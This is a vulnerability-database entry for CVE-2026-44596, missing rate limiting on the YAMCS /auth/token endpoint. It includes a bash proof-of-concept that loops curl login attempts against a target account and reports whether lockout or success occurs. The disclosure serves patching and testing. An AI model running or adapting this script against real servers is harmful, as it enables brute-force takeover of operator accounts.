YAMCS yamcs-core 5.12.7 - No Rate Limiting

🗓️ 30 May 2026 00:00:00Reported by Daniel MirandaType

YAMCS core prior to 5.12.7 has no rate limiting on /auth/token, enabling brute force.

Reporter	Title	Published	Views	Family All 11
GithubExploit	Exploit for CVE-2026-44596	29 May 202613:42	–	githubexploit
Circl	CVE-2026-44596	29 May 202615:00	–	circl
CNNVD	Yamcs security vulnerabilities	30 May 202600:00	–	cnnvd
CVE	CVE-2026-44596	27 May 202600:04	–	cve
Github Security Blog	Yamcs has No Rate Limiting on Authentication Endpoint	27 May 202600:04	–	github
OSV	GHSA-W5R6-MCGQ-7PQ4 Yamcs has No Rate Limiting on Authentication Endpoint	27 May 202600:04	–	osv
Positive Technologies	PT-2026-43456	27 May 202600:00	–	ptsecurity
Snyk	Brute Force	27 May 202600:04	–	snyk
Veracode	Brute Force Attack	15 Jun 202618:01	–	veracode
vulnersOsv	org.yamcs:distribution (>=4.7.1 <=5.12.6), org.yamcs:packet-viewer (>=4.10.3 <=5.12.6) +14 more potentially affected by CVE-2026-44596 via org.yamcs:yamcs-core (>=0.29.3 <=5.12.6)	27 May 202600:04	–	vulnersosv

# Exploit Title: YAMCS yamcs-core  5.12.7 - No Rate Limiting 
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44596
# Category: Remote / Brute Force
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4

#!/bin/bash
# ============================================================
# CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token
# ============================================================
# Vulnerability: POST /auth/token accepts unlimited login
#                attempts with no rate limiting or lockout.
# Impact:        Unauthenticated brute-force of any account.
# Affected:      yamcs-core < 5.12.7
# Fixed in:      yamcs-core 5.12.7
# CWE:           CWE-307
# CVSS:          5.3 MEDIUM
# ============================================================
# Usage: ./poc.sh [target] [username] [attempts]
# Example: ./poc.sh http://localhost:8090 operator 20
# ============================================================

TARGET="${1:-http://localhost:8090}"
USERNAME="${2:-operator}"
ATTEMPTS="${3:-20}"
LAST_STATUS=""

echo "============================================================"
echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC"
echo " Target:   $TARGET"
echo " Username: $USERNAME"
echo " Attempts: $ATTEMPTS"
echo "============================================================"
echo ""
echo "[*] Sending $ATTEMPTS unauthenticated login attempts..."
echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429"
echo ""

for i in $(seq 1 $ATTEMPTS); do
    RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \
        -X POST "$TARGET/auth/token" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -d "grant_type=password&username=$USERNAME&password=wrongpass$i")

    echo "  Attempt $i/$ATTEMPTS: HTTP $RESPONSE"
    LAST_STATUS=$RESPONSE

    if [ "$RESPONSE" = "429" ]; then
        echo ""
        echo "[+] HTTP 429 received — rate limiting active (PATCHED)"
        exit 0
    fi

    if [ "$RESPONSE" = "200" ]; then
        echo ""
        echo "[!!!] HTTP 200 — credentials found at attempt $i"
        exit 0
    fi
done

echo ""
if [ "$LAST_STATUS" = "401" ]; then
    echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected"
    echo "[!!!] Brute-force possible without restriction"
fi

echo ""
echo "============================================================"
echo " Fix: Upgrade to yamcs-core >= 5.12.7"
echo "============================================================"

30 May 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

EPSS0.00052